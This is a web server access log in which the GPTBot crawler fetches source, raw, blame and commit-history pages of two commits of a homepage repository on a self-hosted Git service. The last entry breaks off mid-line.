"/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services" -[17/Feb/2026:14:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" [Client 74.7.227.38] [Length 11074] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" [Client 74.7.227.38] [Length 11075] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" -[17/Feb/2026:14:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" -[17/Feb/2026:14:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" -[17/Feb/2026:14:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" -[17/Feb/2026:14:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11299] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11884] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11299] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" -[17/Feb/2026:14:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" [Client 74.7.227.38] [Length 10021] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" -[17/Feb/2026:14:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11884] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" -[17/Feb/2026:14:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" [Client 74.7.227.38] [Length 10022] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" -[17/Feb/2026:14:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" -[17/Feb/2026:14:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" -[17/Feb/2026:14:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" -[17/Feb/2026:14:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10382] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" -[17/Feb/2026:14:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11211] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" -[17/Feb/2026:14:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10382] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" -[17/Feb/2026:14:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" -[17/Feb/2026:14:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" -[17/Feb/2026:14:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" -[17/Feb/2026:14:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" -[17/Feb/2026:14:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11211] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" -[17/Feb/2026:14:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" -[17/Feb/2026:14:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" [Client 74.7.227.38] [Length 12528] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" -[17/Feb/2026:14:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" [Client 74.7.227.38] [Length 12528] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" -[17/Feb/2026:14:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" [Client 74.7.227.38] [Length 21806] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" [Client 74.7.227.38] [Length 21806] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" -[17/Feb/2026:14:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" -[17/Feb/2026:14:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11152] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" -[17/Feb/2026:14:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11153] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" -[17/Feb/2026:14:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" [Client 74.7.227.38] [Length 11702] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" -[17/Feb/2026:14:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" [Client 74.7.227.38] [Length 11701] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" -[17/Feb/2026:14:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13959] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" -[17/Feb/2026:14:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16508] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" -[17/Feb/2026:14:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14845] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" -[17/Feb/2026:14:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" -[17/Feb/2026:14:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" -[17/Feb/2026:14:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" -[17/Feb/2026:14:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" -[17/Feb/2026:14:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" [Client 74.7.227.38] [Length 23743] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" -[17/Feb/2026:14:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" [Client 74.7.227.38] [Length 23742] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" -[17/Feb/2026:14:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" -[17/Feb/2026:14:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" -[17/Feb/2026:14:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15579] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" -[17/Feb/2026:14:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15580] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" -[17/Feb/2026:14:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13813] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 